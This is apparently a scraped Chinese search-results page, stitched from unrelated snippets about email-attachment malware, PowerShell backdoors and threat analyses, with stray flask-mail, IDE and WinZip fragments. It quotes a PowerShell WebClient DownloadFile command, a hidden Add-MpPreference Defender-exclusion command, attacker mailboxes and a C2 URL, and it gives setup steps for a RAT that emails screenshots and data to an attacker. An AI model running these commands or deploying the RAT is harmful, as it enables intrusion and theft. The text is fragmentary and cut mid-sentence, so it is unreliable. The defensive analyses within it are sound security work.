今天给大家介绍的是一款名叫Powershell-RAT的Python后门,它可以利用Gmail邮件附件来从目标用户的设备中提取数据。...这款RAT可以帮助红队测试人员给任何一台Windows设备安装后门,它不仅可以使用屏幕捕捉功能来跟踪用户的活动,而且还可以通过电子邮件附件来将提取出的数据发送给攻击者。...文件中修改账号的$username和$password变量值; 根据邮箱地址修$msg.From和$msg.To.Add; 如何使用 选项1:通过设置执行策略来不受限制地使用Set-ExecutionPolicyUnrestricted...选项4:该选项将使用Powershell从目标设备上发送电子邮件,并使用Mail.ps1脚本将提取到的数据+屏幕截图以邮件附件的形式进行发送。...配置完成之后,你就可以查看到用户的活动截图了: ? 接下来,工具还将使用Gmail并以邮件附件的形式将提取出的数据发送给攻击者: ?
感染过程 鱼叉邮件附件 感染链从 RTF 文件开始,该文件作为鱼叉邮件的附件进行发送。受害者执行后会向用户连续显示 5 个启用宏的请求。...实际上,诸如 oletools 和 oledump 之类的静态分析工具无助于提供有关 VBA 代码的任何详细信息。此外,使用 ViperMonkey 对 VBA 进行动态分析也并不成功。...一旦五个部分都成功运行,将开始执行生成的 Powershell 代码。 Powershell 执行 合并而来的 Powershell 代码是高度混淆的: ?...Powershell 代码的主要目的是尝试绕过 AMSI 并使用 WebClient().DownloadFile 下载文件。 ?...将窃取的凭据发送到 dir.fb@tolipgoldenplaza.com 使用过的技术 有趣的是,早在 2018 年 3 月也发现了一个非常相似的感染链,也是包含 5 个 OLE 对象的 RTF 文件
无文件型恶意软件所使用的代码不需要驻留在目标Windows设备上,而普通的Windows安装程序涉及到很多的东西:PowerShell、WMI、VB、注册表键和.NET框架等等,但对于无文件型恶意软件来说...此外,PowerShell还可以用于远程访问攻击或绕过应用白名单保护等等。 ? 鉴于这类日趋严重的安全威胁,安全团队可以做些什么来保护他们的组织抵御无文件型恶意软件呢?...这并不意味着你要定期进行安全练习,或偶尔向员工发送钓鱼测试邮件。这里需要我们制定一套安全操作流程,并且让员工有效地意识到电子邮件附件的危险性,防止员工无意识地点击陌生链接。...比如说,攻击者可以发送反向DNS请求,枚举出网络共享的访问控制列表,并查找出特定域组的成员。 因此,安全团队应当遵循“最少权限”的原则,及时检查已过期账户的访问权限,并根据需要限制某些账号的特权。...最后,为了确保不被攻击者利用MS Office恶意宏来实现攻击,我们也应该尽可能地禁用宏功能,不过这并不是一种通用解决方案,因为很多用户仍然需要宏功能来完成他们的工作。 抗争到底!
本文将对常见的window服务端自启动后门技术进行解析,知己知彼方能杜绝后门。 0x01 注册表自启动 通过修改注册表自启动键值,添加一个木马程序路径,实现开机自启动。...0x04 服务自启动 通过服务设置自启动,结合powershell实现无文件后门。...0x05 WMI后门 在2015年的blackhat大会上Matt Graeber介绍了一种无文件后门就是用的WMI。...0x07 COM劫持 利用COM劫持技术,最为关键的是dll的实现以及CLSID的选择,通过修改CLSID下的注册表键值,实现对CAccPropServicesClass和MMDeviceEnumerator...远程访问木马通常与用户请求的程序(如游戏程序)一起,是一种看不见的下载,或作为电子邮件附件发送。一旦主机系统被攻破,入侵者可以利用它来向其他易受感染的计算机分发远程访问木马,从而建立僵尸网络。
在解开这份CHM文档后,瑞星网络安全工程师在一个html页面中找到了原因:这个电子书中的某个HTML页面内,嵌入了一段恶意代码,它可以下载一个PowerShell脚本并执行。...接下来,GetPass.ps1将GetPass.txt作为电子邮件附件,采用STMP协议发送至电子邮箱 xxxxxxxxxx@email.ctbu.edu.cn。...然后再将之前产生的DumpPass.txt,收集的用户桌面上的文档文件、产生的计算机信息文件、屏幕截图等,打包成名为Report.zip的压缩包,并通过电子邮件发送至指定的邮箱。...最后,start.ps1清理痕迹,主要功能执行完毕。 通过分析可知,整个攻击中的核心功能,均为开源项目。...0x05 写在最后 首先希望攻击者尽快停止此次攻击,停止在社交圈内散播携带攻击代码的电子书,在云端移除相关的恶意软件,避免造成更大的危害。
一、发送邮件的配置 在学习flask-mail来发送电子邮件的时候遇到了一些问题,其实都是些小问题,现在记录下来以便于以后查看。 ...# msg.attach("文件名", "类型", 读取文件) with app.open_resource("F:\2281393651481.jpg") as fp: msg.attach...举个例子,示例6-1 展示 了如何配置程序,以便使用Google Gmail 账户发送电子邮件。...这里的2号大坑:set这个设置环境变量的方法,是在cmd里面的!!我用的是powershell!!...然后我们最后补一下关于cmd下还有powershell下面的环境变量区别 在powershell下面,你需要用ls env:的命令,才能显示参数 而设置方法,则是$env : ?
攻击者通过包含比特币黄金(BTG)或Electrum钱包主题的钓鱼邮件附件或链接来部署PowerRatankba。...区块链技术的文档 开发首次代币发行平台(ICO)的协助要求 Falcon加密货币首次代币发行平台(ICO)白皮书 加密货币交易平台的开发应用要求 电子邮件营销软件协助要求 这些恶意CHM文件都使用了短地址来执行相应恶意代码...PowerRatankba利用HTTP进行C&C通信,执行后,PowerRatankba首先通过BaseInfo HTTP POST方式,将包含计算机名称、IP、操作系统启动时间和安装日期、系统语言等感染设备详细信息发送到...持久化文件appView.js中包含XOR编码的PowerShell脚本,用于从硬编码URL中检索Base64编码的PowerShell命令,如URL地址脚本hxxp://macintosh.linkpc...2017年8月,Lazarus Group假冒为韩国国家警察发送了恶意的EXCEL邮件附件,该附件利用了基于宏的VBScript XOR dropper,这种技术早被安全公司归因为Lazarus Group
dea中查看每行代码最后一个修改的人 鼠标放在哪行,哪行后面就会显示最后一个修改本行的人名字 插件 Intellij IDEA插件显示Git每个文件最后提交时间提交人
,并安装远端控制工具 5)金庸被入侵电脑的IE代理设置,建立直连通道,传回大量机密文件 6)更多内网电脑遭到入侵,多半为高阶主管点击了看似正常的邮件附件导致中毒 0x04.4 RSA SecurID...攻击流程: 1)攻击者给RSA的母公司EMC的4名员工发送了2组恶意邮件,邮件附件为”2011 Recruitment Plan.xls“的文件。xls能绑病毒?@.@。...: 鱼叉邮件投递内嵌Powershell脚本的LNK文件,并利用邮件服务器的云附件方式进行投递 当受害者被诱导点击恶意LNK文件后,会执行LNK文件所指向的Powershell命令,进而提取出...LNK文件中的其他诱导文件,持久化后和powershell后门脚本。...漏洞利用成功后释放恶意Powershell下载下一阶段的Powershell脚本 下载后的脚本进行Bypass UAC,并通过劫持系统DLL文件下载核心木马模块 再与C2地址通信下载并执行更多的木马
在新建项目 cmdlet用于创建一个新的文件。在文件名的路径中,用户名环境变量用于自动插入受感染用户的用户名。它可以在任何Windows 10计算机上执行,而无需修改命令的任何部分。...第2步:创建Microsoft帐户 需要Microsoft帐户才能创建和修改托管有效内容的配置文件页面。导航到Live登录页面以启动该过程。...要深入了解Unicorn,请查看“ 如何创建无法检测的有效负载 ”和官方GitHub页面以获取详细信息。...电子邮件附件:网络钓鱼攻击是攻击者试图破坏组织的主要方式之一。有些组织规模太大,无法为员工提供足够的安全意识培训,这使其成为一种有效的技术。...有目的的有效负载: 本文介绍了一个非常简单的PowerShell负载,它在Documents \文件夹中创建了一个空文本文件。
(图片不清楚可点击查看大图) 消息传送 2018年中,48%的恶意电子邮件使用Office文件作为附件,较2017年的5%有大幅上涨。...我们还发现恶意电子邮件中URL的使用率有所下降,原因在于攻击者已经将恶意电子邮件附件作为主要感染载体。2017年恶意URL在电子邮件中使用比例已达到12.3%,但这一数字在2018年回落至7.8%。...赛门铁克遥测数据显示,Microsoft Office用户最容易成为基于电子邮件的恶意软件的受害者,Office文件在所有恶意邮件附件中的占比从2017年的5%跃升至48%。 ?...常见的攻击场景则是使用Office宏调用PowerShell脚本,之后再由PowerShell脚本下载恶意负载。...其中超过三分之一的Formjacking活动发生在2018年最后一个季度,仅该季度拦截到的Formjacking攻击就达136万次。 ?
最近,乌克兰 CERT 披露了有关针对乌克兰国家机构进行攻击的行为,攻击中使用了加密的压缩文件作为电子邮件附件,最终使用 Remcos RAT 进行窃密。...钓鱼邮件 分发 DBatLoader 和 Remcos 的钓鱼邮件通常带有附件,将 tar.lz 等压缩文件伪装成发票或投标文件等能够让电子邮件看起来可信的文件。...钓鱼邮件通常声称或者确实就来自与攻击目标相关的机构或者商业组织,这使得发送发票等行为变得合理。 许多钓鱼邮件是从与目标所在国家或者地区相同的顶级域名的电子邮件发送的。...但这些电子邮件通常不会进行本土化,恶意附件的文本或是电子邮件文本都是使用英文表述的。...powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference
钓鱼攻击是网络犯罪团伙常用的一种手段,很多勒索病毒都曾使用邮件钓鱼的方式欺骗受害者打开相应的附件,运行恶意样本,导致受害者被勒索加密,钓鱼邮件攻击也是APT攻击的常用手段之一,如果收到陌生的邮件,千万不要随便点击附件链接或打开邮件附件中的文件...运行hta脚本之后,调用执行内嵌的powershell脚本,如下所示: ? 解密出powershell脚本,如下所示: ?...解密获取的PowerShell脚本获取主机相关信息,与远程服务器通信,解密出来的PowerShell脚本代码,如下所示: ? 捕获到的网络流量数据,如下所示: ?...通过CMD指令可以远程获取主机文件,进程等信息,下载,上传文件等操作,监控网络流量数据,如下所示: ?...,通过钓鱼邮件定向攻击目标,并进行远程控制的网络攻击行为,此次钓鱼邮件定向攻击同样采用”无文件”攻击手法,无落地PE文件,邮件附件中只包含一个HTA脚本文件,通过执行HTA脚本调用PowerShell执行所有的恶意操作
2016年初至今,根据“火绒威胁情报系统”的数据,我们发现脚本病毒与宏病毒所占的比重在不断加大,使用此类方式进行传播的病毒大部分为下载者病毒(TrojanDownloader),病毒制作者经常将这两种病毒作为邮件附件并将其赋以诱惑性的文字发送给受害者...本文中样本其总体结构与本文前言中所叙述的结构相同,脚本病毒会以邮件附件的形式被发送给受害者。...其主要逻辑是,先将加密的PowerShell命令进行解密,之后执行PowerShell脚本下载病毒文件到本地进行执行。其主要宏脚本内容如下图所示: ?...其解密后的PowerShell脚本内容如下: ? 图2-2-6、解密后的PowerShell脚本 宏病毒与脚本病毒相同,也会不断的变换其外层混淆特征,我们用该家族的另一变种进行举例说明。...脚本类病毒与PE病毒相比具有几大明显优势: 1.各大电子邮件服务网站对文本文件的审查力度有限。 2.用户对此类文件的警惕性较低。 3.脚本病毒的混淆成本较低。
PowerShell命令下载和安装挖矿相关的恶意计划任务,相关的垃圾邮件具体信息如下: ?...近期,马莲发现有很多用户收到相关的钓鱼垃圾邮件,并且恶意的邮件附件样本检测率很低,如果有用户不谨慎点击邮件附件,则系统会被安装挖矿程序,造成系统卡顿等异常现象。...事件分析 我们都知道,“黑球”行动的钓鱼邮件附件是利用Office漏洞CVE-2017-8570漏洞的doc文档。早在2018年,海莲花组织也曾使用过该漏洞的样本进行攻击。...附件readme.doc是一个RTF文档,其使用漏洞触发执行JS脚本,脚本进一步通过PowerShell命令从远端服务器下载恶意的PS脚本在内存中执行,达到“无文件”的效果。 ?...漏洞触发后会执行QBNLaW1s7vq5bki.sct文件,该脚本的作用是通过CMD命令执行恶意的PowerShell命令,在目标设备中植入挖矿程序。 ?
黑客伪造成美国疾病预防与控制中心发送邮件,实则是通过AOL邮箱发送钓鱼邮件。早在2011年,AOL邮箱就有被报道发送钓鱼邮件的事件。...然后伪造发件人向目标邮箱发送钓鱼邮件,诱导收件人查看邮件中带有漏洞利用的邮件附件文档,一旦漏洞成功利用,黑客最终将控制目标PC。 ?...WARZONE RAT功能主要包括: 远程桌面 隐藏的远程桌面-HRDP 特权提升-UAC绕过 远程网络摄像头 窃取密码-支持流行的浏览器和电子邮件客户端( Chrome, Firefox, Internet...木马功能分析 连接C&C,发送并接收数据: ? 木马传输的数据使用了RC4加密算法加密,密钥为“warzone160": ? 下载并执行文件功能: ? 设置开启远程桌面: ?...建议用户不要被邮件内容诱惑,随便打开不明来源的邮件附件,另外要更新系统和相关软件,及时安装漏洞补丁。另外企业IT部门可以针对不明来源的可疑邮件进行过滤和拦截,保护企业内部安全。
并使您可以发送更快,更高效的电子邮件。...– 减小文件大小以克服电子邮件附件限制,更快地共享信息,以及在硬盘驱动器或便携式媒体上存储更多内容。 – 打开十几种不同的压缩文件格式。...– 通过压缩存储在云中的文件来最大化云存储。 – 轻松地组织和重命名云中的文件和文件夹。 – 使用Cloud Links将文件上传到您的云服务,并通过电子邮件快速发送文件的链接。...– 使用强大的128位或256位AES加密技术,确保文件完全安全。 – 在压缩文件时密码保护文件和电子邮件附件。 – 将其他加密文件添加到Zip时重新使用您的密码。...– 发送无法反弹的无忧电子邮件附件。 – 将文件组织并压缩为***凑的逻辑组,非常适合共享。 – 轻松分享到Facebook,Twitter和其他应用程序。
服务器的帐号和密码,请大家提高安全意识,不要轻易打开未知的邮件附件及文档等。...恶意宏代码,会启动PowerShell进程,从远程服务器上下载恶意程序,然后执行,相关参数,如下: powershell (NEw-objEct system.net.wEBclIenT).DownLoAdfIlE...读取远程服务器上的内容,如下所示: ? 直接加载执行远程服务器上的脚本,如下所示: ? 解密去混淆远程服务器上的脚本之后,同样是一个NET编写的程序,如下所示: ?...将记录的浏览器上网站,以及相关的帐号和密码,然后发送到黑客远程FTPd服务器,如下所示: ?...2、不要点击来源不明的邮件附件,不从不明网站下载软件。 3、深信服防火墙客户,建议升级到AF805版本,并开启人工智能引擎Save,以达到最好的防御效果。
在注册过程中,提示受害者输入其详细信息: ? 用户要警惕社交网络中的短链接,骗子经常使用它们。用户不查看真实URL就无法看到它们实际指向的网站,同时对来自不受信任来源的链接进行正确检查很重要。...数据泄漏查询 在2019年,Facebook被罚款50亿美元;但被盗用户不会获得任何赔偿,诈骗者利用电子邮件向目标发送赔偿信息。 ?...例如,在电子邮件中将COVID-1作为延迟发货或重新订购的原因,攻击者将电子邮件标记为紧急,要求立即检查附件。 ? 骗子还注册了针对企业用户的网络钓鱼网站。...在2020年第一季度共检测到49,562,670个恶意电子邮件附件。 Top10恶意附件: ? Top10恶意家族: ? 垃圾邮件目标分布: ?...20.74%;本季度阻止了49,562,670个恶意邮件附件,其中最常见的恶意软件家族是Trojan.Win32.Agentb.gen,占邮件流量的12.35%。
通常,它会通过电子邮件附件、恶意链接、不安全的下载来源或潜在的软件漏洞等途径传播。一旦感染,.mkp勒索病毒会定位和加密数据库文件,使其无法访问和使用。...mkp勒索病毒加密的文件文件按照以下模式重命名:原始文件名、受害者的唯一 ID、网络罪犯的电子邮件地址和“ .mkp ”扩展名。...警惕电子邮件和下载来源:小心处理来自不熟悉或可疑发送者的电子邮件附件和链接。避免从不受信任的来源下载文件和软件,尤其是那些看似引人注意的内容。...因此,及时更新您的安全措施和策略非常重要。保持与网络安全领域的最新发展保持同步,并遵循最佳实践,以增强您的网络安全防御能力。最后,如果您的数据库文件受到.mkp勒索病毒的攻击,请不要慌张。...91数据恢复研究院希望本文能够为您提供有关.mkp勒索病毒的详细信息,并提供有关如何恢复被加密的数据库文件的建议。通过合作和预防,我们可以共同保护我们的数据和系统免受勒索病毒的威胁。谢谢阅读!
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
即时通信 IM
ICP备案
对象存储
实时音视频
